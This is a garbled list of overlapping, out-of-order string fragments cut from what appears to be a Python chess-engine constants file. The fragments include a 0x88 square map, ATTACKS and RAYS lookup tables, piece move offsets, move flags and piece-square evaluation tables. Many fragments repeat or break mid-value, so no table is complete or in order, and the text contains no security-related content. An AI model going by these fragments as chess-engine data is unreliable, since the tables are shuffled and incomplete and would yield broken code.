0, 0, 0,-16, 0, 0, 0,-17, 0, 0, 0, 0, 0,", "3 RANK_6 = 2 RANK_7 = 1 RANK_8 = 0 SQUARES = {", "0, 0, 0, 0, 0, 0, 24,24,24,24,24,24,56, 0, 56,24,24,24,24,24,24, 0, 0, 0, 0,", "4, 'f8': 5, 'g8': 6, 'h8': 7, 'a7': 16, 'b7': 17, 'c7': 18,", "0, 0, 0, 0, 0, 0, 0, 0,-15, 0,-16, 0,-17, 0, 0, 0,", "-2.0, -2.0, -2.0, -1.0], [ 2.0, 2.0, 0.0, 0.0, 0.0, 0.0, 2.0, 2.0", "0.0, 0.0, 0.0, 0.5, -1.0], [ -2.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0,", "-0.5], [ 0.0, 0.0, 0.0, 0.5, 0.5, 0.0, 0.0, 0.0] ] BISHOP_EVAL =", "16, 15, -1] } MCTS_MAPPING = { 'p' : 1, 'n' : 2,", "0, 0, 0, 24, 0, 0, 0, 0, 0, 0,20 ] RAYS =", "'d3': 83, 'e3': 84, 'f3': 85, 'g3': 86, 'h3': 87, 'a2': 96, 'b2':", "0, 0, 0, 0, 0, 0,20, 2, 24, 2,20, 0, 0, 0, 0,", "71, 'a3': 80, 'b3': 81, 'c3': 82, 'd3': 83, 'e3': 84, 'f3': 85,", "0.0, 0.0, 0.0, 0.0, 0.0, -1.0], [ -1.0, 0.0, 0.5, 0.5, 0.5, 0.5,", "-4.0], [-3.0, 0.0, 1.0, 1.5, 1.5, 1.0, 0.0, -3.0], [-3.0, 0.5, 1.5, 2.0,", "'a4': 64, 'b4': 65, 'c4': 66, 'd4': 67, 'e4': 68, 'f4': 69, 'g4':", "-2.0, -2.0, -2.0, -2.0, -1.0], [ 2.0, 2.0, 0.0, 0.0, 0.0, 0.0, 2.0,", "51, 'e5': 52, 'f5': 53, 'g5': 54, 'h5': 55, 'a4': 64, 'b4': 65,", "[ -2.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -2.0] ] KNIGHT_EVAL = [", "0, 0,-15, 0, 0, 0, 0, 0,-16, 0, 0, 0, 0, 0,-17, 0,", "'e4': 68, 'f4': 69, 'g4': 70, 'h4': 71, 'a3': 80, 'b3': 81, 'c3':", "0, 0, 0, 0, 0, 0, 0, 0, 0, 2,53, 56, 53, 2,", "-4.0, -3.0, -3.0, -3.0, -3.0, -4.0, -5.0], [-4.0, -2.0, 0.0, 0.0, 0.0, 0.0,", "1.0, -2.0, -2.0, 1.0, 1.0, 0.5], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,", "} RANK_1 = 7 RANK_2 = 6 RANK_3 = 5 RANK_4 = 4", "0.5, 0.5, -1.0], [ -1.0, 0.0, 1.0, 1.0, 1.0, 1.0, 0.0, -1.0], [", "PAWN = 'p' KNIGHT = 'n' BISHOP = 'b' ROOK = 'r' QUEEN", "17, 'c7': 18, 'd7': 19, 'e7': 20, 'f7': 21, 'g7': 22, 'h7': 23,", "-4.0, -3.0], [ -3.0, -4.0, -4.0, -5.0, -5.0, -4.0, -4.0, -3.0], [ -3.0,", "15, 0, 0, 17, 0, 0, 0, 0, 0, 16, 0, 0, 0,", "0, 0, 0, 0,20, 2, 24, 2,20, 0, 0, 0, 0, 0, 0,", "52, 'f5': 53, 'g5': 54, 'h5': 55, 'a4': 64, 'b4': 65, 'c4': 66,", "'c7': 18, 'd7': 19, 'e7': 20, 'f7': 21, 'g7': 22, 'h7': 23, 'a6':", "-3.0, -3.0, -4.0, -5.0], [-4.0, -2.0, 0.0, 0.0, 0.0, 0.0, -2.0, -4.0], [-3.0,", "0, 24, 0, 0, 0, 0, 0,20, 0, 0, 0, 0, 20, 0,", "'b8': 1, 'c8': 2, 'd8': 3, 'e8': 4, 'f8': 5, 'g8': 6, 'h8':", "0,-17 ] SHIFTS = { 'p': 0, 'n': 1, 'b': 2, 'r': 3,", "'q': 4, 'k': 5 } FLAGS = { 'NORMAL': 'n', 'CAPTURE': 'c', 'BIG_PAWN':", "7, 'a7': 16, 'b7': 17, 'c7': 18, 'd7': 19, 'e7': 20, 'f7': 21,", "0, 0, 0,20, 0, 0, 20,0, 0, 0, 0, 0, 24, 0, 0,", "-3.0], [ -3.0, -4.0, -4.0, -5.0, -5.0, -4.0, -4.0, -3.0], [ -2.0, -3.0,", "0.0], [5.0, 5.0, 5.0, 5.0, 5.0, 5.0, 5.0, 5.0], [1.0, 1.0, 2.0, 3.0,", "-16, -15, 1, 17, 16, 15, -1], 'k': [-17, -16, -15, 1, 17,", "85, 'g3': 86, 'h3': 87, 'a2': 96, 'b2': 97, 'c2': 98, 'd2': 99,", "96, 'b2': 97, 'c2': 98, 'd2': 99, 'e2': 100, 'f2': 101, 'g2': 102,", "0.0], [0.5, -0.5, -1.0, 0.0, 0.0, -1.0, -0.5, 0.5], [0.5, 1.0, 1.0, -2.0,", "0, 15, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 17,", "= { 'b': [16, 32, 17, 15], 'w': [-16, -32, -17, -15] }", "0, 0, 17, 0, 0, 0, 0, 16, 0, 0, 0, 0, 15,", "'g8': 6, 'h8': 7, 'a7': 16, 'b7': 17, 'c7': 18, 'd7': 19, 'e7':", "[ -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5], [ -0.5, 0.0, 0.0,", "-2.0, 0.0, 0.5, 0.5, 0.0, -2.0, -4.0], [-5.0, -4.0, -3.0, -3.0, -3.0, -3.0,", "1.0], [0.5, 0.5, 1.0, 2.5, 2.5, 1.0, 0.5, 0.5], [0.0, 0.0, 0.0, 2.0,", "'h8': 7, 'a7': 16, 'b7': 17, 'c7': 18, 'd7': 19, 'e7': 20, 'f7':", "can move: forward 1, forward 2, right (capture), left (capture) PAWN_OFFSETS = {", "2.0, 3.0, 1.0, 0.0, 0.0, 1.0, 3.0, 2.0 ] ] QUEEN_EVAL = [", "16, 0, 15, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,", "0, 0, 0, 0, 24,24,24,24,24,24,56, 0, 56,24,24,24,24,24,24, 0, 0, 0, 0, 0, 0,", "66, 'd4': 67, 'e4': 68, 'f4': 69, 'g4': 70, 'h4': 71, 'a3': 80,", "-15, 1, 17, 16, 15, -1], 'k': [-17, -16, -15, 1, 17, 16,", "0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 17, 0, 16,", "6, 'h8': 7, 'a7': 16, 'b7': 17, 'c7': 18, 'd7': 19, 'e7': 20,", "[ 0.0, 0.0, 0.0, 0.5, 0.5, 0.0, 0.0, 0.0] ] BISHOP_EVAL = [", "34, 'd6': 35, 'e6': 36, 'f6': 37, 'g6': 38, 'h6': 39, 'a5': 48,", "0.0, -1.0], [ -1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, -1.0], [ -1.0,", "0, 0, 0, 0, 24, 0, 0, 0, 0, 0, 0,20 ] RAYS", "0, 0, 0, 0, 0, 0, 0,20, 0, 0, 24, 0, 0,20, 0,", "[-17, -15, 17, 15], 'r': [-16, 1, 16, -1], 'q': [-17, -16, -15,", "'b': [16, 32, 17, 15], 'w': [-16, -32, -17, -15] } # Directions", "0.5, 0.5, 0.0, 0.0, 0.0] ] BISHOP_EVAL = [ [ -2.0, -1.0, -1.0,", "0.0, 1.5, 2.0, 2.0, 1.5, 0.0, -3.0], [-3.0, 0.5, 1.0, 1.5, 1.5, 1.0,", "= 'p' KNIGHT = 'n' BISHOP = 'b' ROOK = 'r' QUEEN =", "-2.0], [ -1.0, -2.0, -2.0, -2.0, -2.0, -2.0, -2.0, -1.0], [ 2.0, 2.0,", "0.0, 0.0, 0.0, 0.0, 0.0, -1.0], [ -1.0, 0.0, 0.5, 1.0, 1.0, 0.5,", "6 : 'k' } MCTS_COLOR_MAP = { 'w' : 1, 'b' : -1", "-1.0, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -1.0], [ -0.5, 0.0, 0.5, 0.5,", "1.0, 1.0, 1.0, 1.0, 1.0, -1.0], [ -1.0, 0.5, 0.0, 0.0, 0.0, 0.0,", "0.0, 0.0, 0.0], [0.5, -0.5, -1.0, 0.0, 0.0, -1.0, -0.5, 0.5], [0.5, 1.0,", "'f5': 53, 'g5': 54, 'h5': 55, 'a4': 64, 'b4': 65, 'c4': 66, 'd4':", "['1-0', '0-1', '1/2-1/2', '*'] # Directions pawns can move: forward 1, forward 2,", "1.0, 1.0, 1.0, 1.0, 1.0, 0.5], [ -0.5, 0.0, 0.0, 0.0, 0.0, 0.0,", "0, 0, 0,-17 ] SHIFTS = { 'p': 0, 'n': 1, 'b': 2,", "} KING_EVAL = [ [ -3.0, -4.0, -4.0, -5.0, -5.0, -4.0, -4.0, -3.0],", "'f7': 21, 'g7': 22, 'h7': 23, 'a6': 32, 'b6': 33, 'c6': 34, 'd6':", "33, 'c6': 34, 'd6': 35, 'e6': 36, 'f6': 37, 'g6': 38, 'h6': 39,", "WHITE = 'w' EMPTY = -1 PAWN = 'p' KNIGHT = 'n' BISHOP", "'pnbrqkPNBRQK' DEFAULT_POSITION = 'rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1' POSSIBLE_RESULTS = ['1-0', '0-1',", "0, 0, 0, 0, 0, 0, 20, 0, 0, 0, 0, 24, 0,", "EMPTY = -1 PAWN = 'p' KNIGHT = 'n' BISHOP = 'b' ROOK", "0,-16, 0, 0,-17, 0, 0, 0, 0, 0, 0, 0, 0,-15, 0, 0,", "82, 'd3': 83, 'e3': 84, 'f3': 85, 'g3': 86, 'h3': 87, 'a2': 96,", "'f4': 69, 'g4': 70, 'h4': 71, 'a3': 80, 'b3': 81, 'c3': 82, 'd3':", "0,-16, 0, 0, 0,-17, 0, 0, 0, 0, 0, 0,-15, 0, 0, 0,", "} MCTS_COLOR_MAP = { 'w' : 1, 'b' : -1 } ATTACKS =", "0, 15, 0, 0, 0, 0, 0, 0, 17, 0, 0, 0, 16,", "} FLAGS = { 'NORMAL': 'n', 'CAPTURE': 'c', 'BIG_PAWN': 'b', 'EP_CAPTURE': 'e', 'PROMOTION':", "4, 'EP_CAPTURE': 8, 'PROMOTION': 16, 'KSIDE_CASTLE': 32, 'QSIDE_CASTLE': 64 } RANK_1 = 7", "37, 'g6': 38, 'h6': 39, 'a5': 48, 'b5': 49, 'c5': 50, 'd5': 51,", "0, 0, 0, 0, 0, 0, 0,-15, 0, 0, 0,-16, 0, 0, 0,-17,", "-15] } # Directions different pieces can move PIECE_OFFSETS = { 'n': [-18,", "15, 0, 0, 0, 0, 17, 0, 0, 0, 0, 16, 0, 0,", "'e5': 52, 'f5': 53, 'g5': 54, 'h5': 55, 'a4': 64, 'b4': 65, 'c4':", "-2.0], [ -1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.0], [ -1.0, 0.0,", "-2.0, -4.0], [-5.0, -4.0, -3.0, -3.0, -3.0, -3.0, -4.0, -5.0] ] PAWN_EVAL =", "-0.5, -1.0, 0.0, 0.0, -1.0, -0.5, 0.5], [0.5, 1.0, 1.0, -2.0, -2.0, 1.0,", "0, 0, 0, 0,-16, 0, 0, 0, 0, 0,-17, 0, 0, -15, 0,", "'flag': BITS['QSIDE_CASTLE']}, {'square': SQUARES['h8'], 'flag': BITS['KSIDE_CASTLE']}] } KING_EVAL = [ [ -3.0, -4.0,", "0, 0, 0, 0, 0, 0, 0, 0, 0,20, 2, 24, 2,20, 0,", "= 'w' EMPTY = -1 PAWN = 'p' KNIGHT = 'n' BISHOP =", "-3.0, -4.0, -5.0], [-4.0, -2.0, 0.0, 0.0, 0.0, 0.0, -2.0, -4.0], [-3.0, 0.0,", "31, 14], 'b': [-17, -15, 17, 15], 'r': [-16, 1, 16, -1], 'q':", "'w' : 1, 'b' : -1 } ATTACKS = [ 20,0, 0, 0,", "0.0, 1.0, 3.0, 2.0 ] ] QUEEN_EVAL = [ [ -2.0, -1.0, -1.0,", "-4.0, -4.0, -3.0], [ -3.0, -4.0, -4.0, -5.0, -5.0, -4.0, -4.0, -3.0], [", "1, 'CAPTURE': 2, 'BIG_PAWN': 4, 'EP_CAPTURE': 8, 'PROMOTION': 16, 'KSIDE_CASTLE': 32, 'QSIDE_CASTLE': 64", "0.5, 0.5, 0.5, 0.0, -0.5], [ -1.0, 0.5, 0.5, 0.5, 0.5, 0.5, 0.0,", "1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.5], [ -0.5, 0.0, 0.0, 0.0, 0.0,", "0.0, 0.0, 0.0, 0.0, 2.0, 2.0 ], [ 2.0, 3.0, 1.0, 0.0, 0.0,", "= 'b' WHITE = 'w' EMPTY = -1 PAWN = 'p' KNIGHT =", "'NORMAL': 'n', 'CAPTURE': 'c', 'BIG_PAWN': 'b', 'EP_CAPTURE': 'e', 'PROMOTION': 'p', 'KSIDE_CASTLE': 'k', 'QSIDE_CASTLE':", "0, 0, 0, 0, 0, 0, 0, 0, 2,53, 56, 53, 2, 0,", "= 'pnbrqkPNBRQK' DEFAULT_POSITION = 'rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1' POSSIBLE_RESULTS = ['1-0',", "CONSTANTS ####################################################### BLACK = 'b' WHITE = 'w' EMPTY = -1 PAWN =", "-1 } ATTACKS = [ 20,0, 0, 0, 0, 0, 0, 24, 0,", "0, 24, 0, 0, 0,20, 0, 0, 0, 0, 0, 0, 20, 0,", "0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 15, 0,", "-1.0, 0.5, 0.0, 0.0, 0.0, 0.0, 0.5, -1.0], [ -2.0, -1.0, -1.0, -1.0,", "2 RANK_7 = 1 RANK_8 = 0 SQUARES = { 'a8': 0, 'b8':", "] PAWN_EVAL = [ [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [5.0,", "14], 'b': [-17, -15, 17, 15], 'r': [-16, 1, 16, -1], 'q': [-17,", "0.5, 0.0, -0.5], [ 0.0, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -0.5], [", "w KQkq - 0 1' POSSIBLE_RESULTS = ['1-0', '0-1', '1/2-1/2', '*'] # Directions", "0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [ 0.5, 1.0, 1.0, 1.0,", "-1.0, -2.0] ] ROOK_EVAL = [ [ 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,", "0.0] ] BISHOP_EVAL = [ [ -2.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0,", "-1.0], [ -1.0, 0.0, 0.5, 0.0, 0.0, 0.0, 0.0, -1.0], [ -2.0, -1.0,", "(capture) PAWN_OFFSETS = { 'b': [16, 32, 17, 15], 'w': [-16, -32, -17,", "15, -1], 'k': [-17, -16, -15, 1, 17, 16, 15, -1] } MCTS_MAPPING", "1, 1, 1, 0, -1, -1, -1,-1, -1, -1, -1, 0, 0, 0,", "-1,-1, -1, -1, -1, 0, 0, 0, 0, 0, 0, 0,-15,-16,-17, 0, 0,", "'h2': 103, 'a1': 112, 'b1': 113, 'c1': 114, 'd1': 115, 'e1': 116, 'f1':", "-32, -17, -15] } # Directions different pieces can move PIECE_OFFSETS = {", "[ [ -2.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -2.0], [ -1.0, 0.0,", "'b', 'EP_CAPTURE': 'e', 'PROMOTION': 'p', 'KSIDE_CASTLE': 'k', 'QSIDE_CASTLE': 'q' } BITS = {", "KNIGHT = 'n' BISHOP = 'b' ROOK = 'r' QUEEN = 'q' KING", "0, 0, 24, 0, 0, 0, 0, 0, 0,20, 0, 0, 20,0, 0,", "0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.0], [ -1.0, 0.0, 0.5, 1.0, 1.0,", "= { 'NORMAL': 'n', 'CAPTURE': 'c', 'BIG_PAWN': 'b', 'EP_CAPTURE': 'e', 'PROMOTION': 'p', 'KSIDE_CASTLE':", "1.0, 1.5, 1.5, 1.0, 0.5, -3.0], [-4.0, -2.0, 0.0, 0.5, 0.5, 0.0, -2.0,", "[-4.0, -2.0, 0.0, 0.5, 0.5, 0.0, -2.0, -4.0], [-5.0, -4.0, -3.0, -3.0, -3.0,", "'k', 'QSIDE_CASTLE': 'q' } BITS = { 'NORMAL': 1, 'CAPTURE': 2, 'BIG_PAWN': 4,", "-0.5, -0.5, -1.0, -1.0, -2.0] ] ROOK_EVAL = [ [ 0.0, 0.0, 0.0,", "0, 0, 2,53, 56, 53, 2, 0, 0, 0, 0, 0, 0, 0,", "0, 0,20, 0, 0, 0, 0, 0, 0,20, 0, 0, 0, 24, 0,", "5.0], [1.0, 1.0, 2.0, 3.0, 3.0, 2.0, 1.0, 1.0], [0.5, 0.5, 1.0, 2.5,", "0, 0, 20, 0, 0, 0, 0, 24, 0, 0, 0, 0,20, 0,", "2, 'd8': 3, 'e8': 4, 'f8': 5, 'g8': 6, 'h8': 7, 'a7': 16,", "0, 0, 0, 0, 0, 0, 0, 0,20, 2, 24, 2,20, 0, 0,", "0, 56,24,24,24,24,24,24, 0, 0, 0, 0, 0, 0, 2,53, 56, 53, 2, 0,", "4 RANK_5 = 3 RANK_6 = 2 RANK_7 = 1 RANK_8 = 0", "= [ [ 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [ 0.5,", "0, 1, 1, 1, 1, 1, 1, 1, 0, -1, -1, -1,-1, -1,", "2.5, 2.5, 1.0, 0.5, 0.5], [0.0, 0.0, 0.0, 2.0, 2.0, 0.0, 0.0, 0.0],", "0, 0, 0, 2,53, 56, 53, 2, 0, 0, 0, 0, 0, 0,", "0, 0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 15,", "0, 0, 0,-16, 0, 0, 0, 0, 0,-17, 0, 0, -15, 0, 0,", "= 'r' QUEEN = 'q' KING = 'k' SYMBOLS = 'pnbrqkPNBRQK' DEFAULT_POSITION =", "0, 0, 15, 0, 0, 0, 0, 17, 0, 0, 0, 0, 16,", "0, 0, 0, 17, 0, 0, 0, 0, 16, 0, 0, 0, 0,", "-4.0, -5.0, -5.0, -4.0, -4.0, -3.0], [ -2.0, -3.0, -3.0, -4.0, -4.0, -3.0,", "'g3': 86, 'h3': 87, 'a2': 96, 'b2': 97, 'c2': 98, 'd2': 99, 'e2':", "-4.0, -3.0, -3.0, -2.0], [ -1.0, -2.0, -2.0, -2.0, -2.0, -2.0, -2.0, -1.0],", "24, 0, 0, 0, 0, 0,20, 0, 0, 0, 0, 20, 0, 0,", "100, 'f2': 101, 'g2': 102, 'h2': 103, 'a1': 112, 'b1': 113, 'c1': 114,", "0, 24, 0, 0,20, 0, 0, 0, 0, 0, 0, 0, 0,20, 0,", "'BIG_PAWN': 4, 'EP_CAPTURE': 8, 'PROMOTION': 16, 'KSIDE_CASTLE': 32, 'QSIDE_CASTLE': 64 } RANK_1 =", "-14, 18, 33, 31, 14], 'b': [-17, -15, 17, 15], 'r': [-16, 1,", "[{'square': SQUARES['a8'], 'flag': BITS['QSIDE_CASTLE']}, {'square': SQUARES['h8'], 'flag': BITS['KSIDE_CASTLE']}] } KING_EVAL = [ [", "0, 0, 0, 0, 0, 0, 17, 16, 15, 0, 0, 0, 0,", "0, 0, 1, 1, 1, 1, 1, 1, 1, 0, -1, -1, -1,-1,", "0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5], [ -0.5, 0.0, 0.0, 0.0, 0.0,", "SQUARES = { 'a8': 0, 'b8': 1, 'c8': 2, 'd8': 3, 'e8': 4,", "-31, -14, 18, 33, 31, 14], 'b': [-17, -15, 17, 15], 'r': [-16,", "0, 0,20, 0, 0, 0, 0, 20, 0, 0, 0, 0, 24, 0,", "BITS['KSIDE_CASTLE']}] } KING_EVAL = [ [ -3.0, -4.0, -4.0, -5.0, -5.0, -4.0, -4.0,", "0,-17, 0, 0, 0, 0, 0, 0, 0, 0,-15, 0, 0, 0,-16, 0,", "MCTS_MAPPING = { 'p' : 1, 'n' : 2, 'b' : 3, 'r'", "56, 53, 2, 0, 0, 0, 0, 0, 0, 24,24,24,24,24,24,56, 0, 56,24,24,24,24,24,24, 0,", "-1], 'q': [-17, -16, -15, 1, 17, 16, 15, -1], 'k': [-17, -16,", "0.5, 0.5, 0.5, 0.0, -1.0], [ -0.5, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0,", "0, 0, 24, 0, 0, 0, 0,20, 0, 0, 0, 0, 0, 0,20,", "0, 0,-15, 0, 0,-16, 0, 0,-17, 0, 0, 0, 0, 0, 0, 0,", "[ -2.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -2.0], [ -1.0, 0.0, 0.0,", ": 'b', 4 : 'r', 5 : 'q', 6 : 'k' } MCTS_COLOR_MAP", "18, 33, 31, 14], 'b': [-17, -15, 17, 15], 'r': [-16, 1, 16,", "'d4': 67, 'e4': 68, 'f4': 69, 'g4': 70, 'h4': 71, 'a3': 80, 'b3':", "24, 0, 0, 0,20, 0, 0, 0, 0, 0, 0, 0, 0,20, 0,", "0, 20,0, 0, 0, 0, 0, 24, 0, 0, 0, 0, 0,20, 0,", "2.0, 2.0, 1.5, 0.0, -3.0], [-3.0, 0.5, 1.0, 1.5, 1.5, 1.0, 0.5, -3.0],", "'p': 0, 'n': 1, 'b': 2, 'r': 3, 'q': 4, 'k': 5 }", "67, 'e4': 68, 'f4': 69, 'g4': 70, 'h4': 71, 'a3': 80, 'b3': 81,", "16, 15, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1,", "0, 0, 0, 0, 0, 20, 0, 0, 0, 0, 24, 0, 0,", "} ROOKS = { 'w': [{'square': SQUARES['a1'], 'flag': BITS['QSIDE_CASTLE']}, {'square': SQUARES['h1'], 'flag': BITS['KSIDE_CASTLE']}],", "16, 0, 0, 0, 0, 15, 0, 0, 0, 0, 0, 0, 17,", "SQUARES['a1'], 'flag': BITS['QSIDE_CASTLE']}, {'square': SQUARES['h1'], 'flag': BITS['KSIDE_CASTLE']}], 'b': [{'square': SQUARES['a8'], 'flag': BITS['QSIDE_CASTLE']}, {'square':", "101, 'g2': 102, 'h2': 103, 'a1': 112, 'b1': 113, 'c1': 114, 'd1': 115,", "0.0, -0.5], [ 0.0, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -0.5], [ -1.0,", "0.0, 0.0, 0.5, -1.0], [ -2.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -2.0]", "1, 17, 16, 15, -1], 'k': [-17, -16, -15, 1, 17, 16, 15,", "0, 0, 0, 0, 0, 0, 0, 17, 0, 0, 16, 0, 0,", "0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [5.0, 5.0, 5.0, 5.0, 5.0, 5.0,", "= 'q' KING = 'k' SYMBOLS = 'pnbrqkPNBRQK' DEFAULT_POSITION = 'rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq", "5.0, 5.0], [1.0, 1.0, 2.0, 3.0, 3.0, 2.0, 1.0, 1.0], [0.5, 0.5, 1.0,", "0, 0, 0,20, 0, 0, 24, 0, 0,20, 0, 0, 0, 0, 0,", "0, 0,-17 ] SHIFTS = { 'p': 0, 'n': 1, 'b': 2, 'r':", "-1, -1, -1,-1, -1, -1, -1, 0, 0, 0, 0, 0, 0, 0,-15,-16,-17,", "0, 0, 0, 0,-17 ] SHIFTS = { 'p': 0, 'n': 1, 'b':", "2.0 ], [ 2.0, 3.0, 1.0, 0.0, 0.0, 1.0, 3.0, 2.0 ] ]", "0.0, 0.5, 0.0, 0.0, 0.0, 0.0, -1.0], [ -2.0, -1.0, -1.0, -0.5, -0.5,", "3 : 'b', 4 : 'r', 5 : 'q', 6 : 'k' }", "0, 0, 0, 0,-17, 0, 0, 0, 0,-15, 0, 0, 0, 0, 0,-16,", "1.0, 0.5, 0.5], [0.0, 0.0, 0.0, 2.0, 2.0, 0.0, 0.0, 0.0], [0.5, -0.5,", "0, 0, 0, 0,20, 0, 0, 0, 24, 0, 0, 0,20, 0, 0,", "0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [ 0.5, 1.0, 1.0, 1.0, 1.0,", "0,20, 0, 0, 0, 0, 0, 0, 0, 0,20, 0, 0, 24, 0,", "0.0, 1.0, 1.5, 1.5, 1.0, 0.0, -3.0], [-3.0, 0.5, 1.5, 2.0, 2.0, 1.5,", "1.0, 1.0, 1.0, 1.0, -1.0], [ -1.0, 0.5, 0.0, 0.0, 0.0, 0.0, 0.5,", "1.0, 1.0, -2.0, -2.0, 1.0, 1.0, 0.5], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0,", "0, 0, 0, 0, 0,20, 0, 0, 0, 24, 0, 0, 0,20, 0,", "16, 15, -1], 'k': [-17, -16, -15, 1, 17, 16, 15, -1] }", "= { 'n': [-18, -33, -31, -14, 18, 33, 31, 14], 'b': [-17,", "17, 0, 0, 0, 0, 0, 0, 16, 0, 0, 0, 0, 0,", "0, 24, 0, 0, 0, 0,20, 0, 0, 0, 0, 0, 0,20, 0,", "'EP_CAPTURE': 8, 'PROMOTION': 16, 'KSIDE_CASTLE': 32, 'QSIDE_CASTLE': 64 } RANK_1 = 7 RANK_2", "-1.0, -0.5, -0.5, -1.0, -1.0, -2.0], [ -1.0, 0.0, 0.0, 0.0, 0.0, 0.0,", "'c2': 98, 'd2': 99, 'e2': 100, 'f2': 101, 'g2': 102, 'h2': 103, 'a1':", "0, 'n': 1, 'b': 2, 'r': 3, 'q': 4, 'k': 5 } FLAGS", "0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [5.0, 5.0, 5.0, 5.0, 5.0, 5.0, 5.0,", "[-18, -33, -31, -14, 18, 33, 31, 14], 'b': [-17, -15, 17, 15],", "'b', 4 : 'r', 5 : 'q', 6 : 'k' } MCTS_COLOR_MAP =", ": -1 } ATTACKS = [ 20,0, 0, 0, 0, 0, 0, 24,", "0, 0,-15, 0,-16, 0,-17, 0, 0, 0, 0, 0, 0, 0, 0, 0,", "'a7': 16, 'b7': 17, 'c7': 18, 'd7': 19, 'e7': 20, 'f7': 21, 'g7':", "[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [5.0, 5.0, 5.0, 5.0, 5.0,", "0,20, 0, 0, 20,0, 0, 0, 0, 0, 24, 0, 0, 0, 0,", "24, 0, 0, 0, 0,20, 0, 0, 0, 0, 20,0, 0, 0, 0,", "0,20, 0, 0, 0, 0, 20,0, 0, 0, 0, 0, 24, 0, 0,", "0.0, -0.5], [ -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5], [ 0.0,", "0, 0,-16, 0, 0, 0, 0, 0,-17, 0, 0, -15, 0, 0, 0,", "0, 0, 0, 0, 0,20, 0, 0, 24, 0, 0,20, 0, 0, 0,", "0, 0, 0,-17, 0, 0, -15, 0, 0, 0, 0, 0, 0,-16, 0,", "KQkq - 0 1' POSSIBLE_RESULTS = ['1-0', '0-1', '1/2-1/2', '*'] # Directions pawns", "2 : 'n', 3 : 'b', 4 : 'r', 5 : 'q', 6", "2, 'r': 3, 'q': 4, 'k': 5 } FLAGS = { 'NORMAL': 'n',", "0.0, -3.0], [-3.0, 0.5, 1.0, 1.5, 1.5, 1.0, 0.5, -3.0], [-4.0, -2.0, 0.0,", "[ [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [5.0, 5.0, 5.0, 5.0,", "[0.5, 1.0, 1.0, -2.0, -2.0, 1.0, 1.0, 0.5], [0.0, 0.0, 0.0, 0.0, 0.0,", "KING_EVAL = [ [ -3.0, -4.0, -4.0, -5.0, -5.0, -4.0, -4.0, -3.0], [", "{ 'p' : 1, 'n' : 2, 'b' : 3, 'r' : 4,", "0.0, 0.0, 0.0, 2.0, 2.0 ], [ 2.0, 3.0, 1.0, 0.0, 0.0, 1.0,", "0.5, 0.0, -1.0], [ -1.0, 0.5, 0.5, 1.0, 1.0, 0.5, 0.5, -1.0], [", "] RAYS = [ 17, 0, 0, 0, 0, 0, 0, 16, 0,", "-1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -2.0] ] KNIGHT_EVAL = [ [-5.0, -4.0,", "0.0, -3.0], [-3.0, 0.5, 1.5, 2.0, 2.0, 1.5, 0.5, -3.0], [-3.0, 0.0, 1.5,", "-4.0, -4.0, -3.0], [ -2.0, -3.0, -3.0, -4.0, -4.0, -3.0, -3.0, -2.0], [", "'w': [-16, -32, -17, -15] } # Directions different pieces can move PIECE_OFFSETS", "2, 'BIG_PAWN': 4, 'EP_CAPTURE': 8, 'PROMOTION': 16, 'KSIDE_CASTLE': 32, 'QSIDE_CASTLE': 64 } RANK_1", "0, 0, 0, 0, 0,20, 0, 0, 20,0, 0, 0, 0, 0, 24,", "RANK_4 = 4 RANK_5 = 3 RANK_6 = 2 RANK_7 = 1 RANK_8", "0, 0, 0, 0, 0, 24,24,24,24,24,24,56, 0, 56,24,24,24,24,24,24, 0, 0, 0, 0, 0,", "1, 16, -1], 'q': [-17, -16, -15, 1, 17, 16, 15, -1], 'k':", "'q': [-17, -16, -15, 1, 17, 16, 15, -1], 'k': [-17, -16, -15,", "21, 'g7': 22, 'h7': 23, 'a6': 32, 'b6': 33, 'c6': 34, 'd6': 35,", "1, forward 2, right (capture), left (capture) PAWN_OFFSETS = { 'b': [16, 32,", "'p' : 1, 'n' : 2, 'b' : 3, 'r' : 4, 'q'", "0, 15, 0, 0, 17, 0, 0, 0, 0, 0, 16, 0, 0,", "22, 'h7': 23, 'a6': 32, 'b6': 33, 'c6': 34, 'd6': 35, 'e6': 36,", "0.0, 0.0, 0.0] ] BISHOP_EVAL = [ [ -2.0, -1.0, -1.0, -1.0, -1.0,", "56,24,24,24,24,24,24, 